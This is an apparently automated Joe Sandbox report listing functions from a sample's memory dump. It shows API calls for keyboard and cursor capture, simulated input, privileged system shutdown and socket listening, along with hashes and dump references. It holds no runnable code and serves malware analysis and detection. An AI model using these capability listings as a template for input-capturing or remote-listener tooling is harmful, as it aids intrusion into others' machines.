                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4104443479-0
                                                                                                                                                          • Opcode ID: 74391fd9675a6df1ee2dc23afa105bdb5aacbd4daf241f8dc5701221913acdad
                                                                                                                                                          • Instruction ID: 8fc03fd5c5f9522ccf9178217f4367f4c425f24c281da8096c27f283551afce8
                                                                                                                                                          • Opcode Fuzzy Hash: 74391fd9675a6df1ee2dc23afa105bdb5aacbd4daf241f8dc5701221913acdad
                                                                                                                                                          • Instruction Fuzzy Hash: 0512AD70A01619EFDF14DFA4E981AAEB7F5FF58300F204569E806E7250EB35AD61CB50
                                                                                                                                                          Function 0018EAA6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                            • Part of subcall function 0013B736: GetCursorPos.USER32(000000FF), ref: 0013B749
                                                                                                                                                            • Part of subcall function 0013B736: ScreenToClient.USER32(00000000,000000FF), ref: 0013B766
                                                                                                                                                            • Part of subcall function 0013B736: GetAsyncKeyState.USER32(00000001), ref: 0013B78B
                                                                                                                                                            • Part of subcall function 0013B736: GetAsyncKeyState.USER32(00000002), ref: 0013B799
                                                                                                                                                          • ReleaseCapture.USER32 ref: 0018EB1A
                                                                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 0018EBC2
                                                                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0018EBD5
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0018ECAE
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                          • API String ID: 973565025-2107944366
                                                                                                                                                          • Opcode ID: 0a3bffc227f4047577f39dd390f378789ae66d997063b9d56d34c04da6fbbeba
                                                                                                                                                          • Instruction ID: 091aea94e9992fc225b4ce4d642829d63fcc14195caba463d9c382f086af5f18
                                                                                                                                                          • Opcode Fuzzy Hash: 0a3bffc227f4047577f39dd390f378789ae66d997063b9d56d34c04da6fbbeba
                                                                                                                                                          • Instruction Fuzzy Hash: AE518A71204344AFD704EF24DC96FAE7BE5FB88700F404A29F986972E1DB709A54CB52
                                                                                                                                                          Function 001682D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0015BEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0015BF0F
                                                                                                                                                            • Part of subcall function 0015BEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0015BF3C
                                                                                                                                                            • Part of subcall function 0015BEC3: GetLastError.KERNEL32 ref: 0015BF49
                                                                                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 0016830C
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                          • String ID: $@$SeShutdownPrivilege
                                                                                                                                                          • API String ID: 2234035333-194228
                                                                                                                                                          • Opcode ID: a637ac11d62f7899cc5f6441bc0e73eebc8eb12c04098da0ca90a617d7654fc6
                                                                                                                                                          • Instruction ID: 55997fd58969aef154275f00f7753608fac65025d6f6bfee0a512876b5fa0dbe
                                                                                                                                                          • Opcode Fuzzy Hash: a637ac11d62f7899cc5f6441bc0e73eebc8eb12c04098da0ca90a617d7654fc6
                                                                                                                                                          • Instruction Fuzzy Hash: 6F01F271A44311ABE76826788C8BBBB3268FB01B81F140A24F953E63C2DF60DC1082A0
                                                                                                                                                          Function 001791DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00179235
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 00179244
                                                                                                                                                          • bind.WS2_32(00000000,?,00000010), ref: 00179260
                                                                                                                                                          • listen.WS2_32(00000000,00000005), ref: 0017926F
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000), ref: 00179289
                                                                                                                                                          • closesocket.WS2_32(00000000), ref: 0017929D
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1279440585-0
                                                                                                                                                          • Opcode ID: ede56f5156b88e988cb37a4e4819fe2cd034e9b9a4718a43bda93e69f3218891
                                                                                                                                                          • Instruction ID: c06e0a47e6e7064e9d0ee72ec8c25ba6184a9bc5fe9b4dcffd8e211f258b4d2d
                                                                                                                                                          • Opcode Fuzzy Hash: ede56f5156b88e988cb37a4e4819fe2cd034e9b9a4718a43bda93e69f3218891
                                                                                                                                                          • Instruction Fuzzy Hash: 6221A231600610AFCB04FF64DC45B6E77B9EF45324F108159F95AA7792CB30AD45CB51
                                                                                                                                                          Function 0012A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0014010A: std::exception::exception.LIBCMT ref: 0014013E
                                                                                                                                                            • Part of subcall function 0014010A: __CxxThrowException@8.LIBCMT ref: 00140153
                                                                                                                                                          • _memmove.LIBCMT ref: 00193020
                                                                                                                                                          • _memmove.LIBCMT ref: 00193135
                                                                                                                                                          • _memmove.LIBCMT ref: 001931DC
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1300846289-0
                                                                                                                                                          • Opcode ID: 96446698cac9b62b3263d758aeee55c4de14334792021fb9137e4d2e786323a3
                                                                                                                                                          • Instruction ID: 34aff9cb3fb47d82c39ec677abcc7567a659192b0f4ce1baf74e1af50d06cfc0
                                                                                                                                                          • Opcode Fuzzy Hash: 96446698cac9b62b3263d758aeee55c4de14334792021fb9137e4d2e786323a3
                                                                                                                                                          • Instruction Fuzzy Hash: D002B070E00219DFCF08DF64D981AAEBBF5EF58300F558069E806DB265EB31DA65CB91
                                                                                                                                                          Function 001796E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0017ACD3: inet_addr.WS2_32(00000000), ref: 0017ACF5
                                                                                                                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 0017973D
                                                                                                                                                          • WSAGetLastError.WS2_32(00000000,00000000), ref: 00179760
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLastinet_addrsocket
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4170576061-0
                                                                                                                                                          • Opcode ID: 85c5839f0b8016a2dc9dfeaad0a42c417d3bc9801fc4b1ef71f4326a2b8ca440
                                                                                                                                                          • Instruction ID: 384953d6daf9a4e90cf5f12133f1cb815926d1c4b3b8226dad415e0649459e45
                                                                                                                                                          • Opcode Fuzzy Hash: 85c5839f0b8016a2dc9dfeaad0a42c417d3bc9801fc4b1ef71f4326a2b8ca440
                                                                                                                                                          • Instruction Fuzzy Hash: 2441F671600214AFDB14AF68DC82E7E77EDEF54328F148048F956AB392DB749E418B91
                                                                                                                                                          Function 0016F350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0016F37A
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0016F3AA
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0016F3BF
                                                                                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 0016F3D0
                                                                                                                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0016F3FE
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2387731787-0
                                                                                                                                                          • Opcode ID: d9e688b389b0ee16ba45f5f919a26ec2dbf75afdba7a5163008e746865ee2098
                                                                                                                                                          • Instruction ID: 8aed12908d5eab6706d5ee5b511cfc50706347dd141a5c8f32da033d87d49a7a
                                                                                                                                                          • Opcode Fuzzy Hash: d9e688b389b0ee16ba45f5f919a26ec2dbf75afdba7a5163008e746865ee2098
                                                                                                                                                          • Instruction Fuzzy Hash: F941CC756007029FC708DF28D890A9AB3E4FF59324F10412EE95ACB7A1DB31E956CB91
                                                                                                                                                          Function 00164342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 0016439C
                                                                                                                                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 001643B8
                                                                                                                                                          • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00164425
                                                                                                                                                          • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00164483
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 432972143-0
                                                                                                                                                          • Opcode ID: 39dad6e98b75506f28f6d7d8e6d4674756b5f35c23b9a17be9e0f311d46f1324
                                                                                                                                                          • Instruction ID: 3e6f68d99fcc493f7b200a2f5de60bf17b599d5edb7d8697015ee99619b5949e
                                                                                                                                                          • Opcode Fuzzy Hash: 39dad6e98b75506f28f6d7d8e6d4674756b5f35c23b9a17be9e0f311d46f1324
                                                                                                                                                          • Instruction Fuzzy Hash: 6F4125B0E00258AFEF348B64DC0A7FEBBB9AF55311F04415AF492936C1CB7489A5D761
                                                                                                                                                          Function 0018EFA8 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0018EFE2
                                                                                                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0019F3C3,?,?,?,?,?), ref: 0018EFF7
                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0018F041
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0019F3C3,?,?,?), ref: 0018F077
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1423138444-0
                                                                                                                                                          • Opcode ID: e28d87a404d5fd67e656067ed868412cf5e40d5d0d5f49cc61c7231c37f7b3e3
                                                                                                                                                          • Instruction ID: 0eb19ba8f1fb56b4a3bff631fc963ffa3897c176cf806eacb55253b4116163b0
                                                                                                                                                          • Opcode Fuzzy Hash: e28d87a404d5fd67e656067ed868412cf5e40d5d0d5f49cc61c7231c37f7b3e3
                                                                                                                                                          • Instruction Fuzzy Hash: 9A210131600118FFCB259F54D898EEE7BB6EF0A710F144068F9058B2A2C3359E92DF90
                                                                                                                                                          Function 0016220C Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0016221E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: lstrlen
                                                                                                                                                          • String ID: ($|
                                                                                                                                                          • API String ID: 1659193697-1631851259
                                                                                                                                                          • Opcode ID: 6c368b557ec72a51b95fa5bb3980698937d691ade5dc2441c5f9bdd0c84a8544
                                                                                                                                                          • Instruction ID: d2f4c56b99b6ad19a04f21f20876e58db10845d87f7bd3af9c63d9db0de2aba4
                                                                                                                                                          • Opcode Fuzzy Hash: 6c368b557ec72a51b95fa5bb3980698937d691ade5dc2441c5f9bdd0c84a8544
                                                                                                                                                          • Instruction Fuzzy Hash: 70321575A00B059FC728CF69C490A6AB7F0FF48320B15C46EE99ADB7A1E770E951CB44
                                                                                                                                                          Function 0013AD5C Relevance: 4.9, APIs: 3, Instructions: 378nativeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0013AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0013AF8E
                                                                                                                                                          • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 0013AE5E
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DialogLongNtdllProc_Window
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2065330234-0
                                                                                                                                                          • Opcode ID: 602a6e454bad67f258091526914450f49a6f6b02895a7187cdc81afaf559849f
                                                                                                                                                          • Instruction ID: b27fba514d7dc085e462343b46346d7d804f504dcaa13d548074c084369510ef
                                                                                                                                                          • Opcode Fuzzy Hash: 602a6e454bad67f258091526914450f49a6f6b02895a7187cdc81afaf559849f
                                                                                                                                                          • Instruction Fuzzy Hash: 66A126B4104204BADF2CAB295C88D7F3A5DEF52751F91413DF482D61A2DB2A9D42E373
                                                                                                                                                          Function 0017550C Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
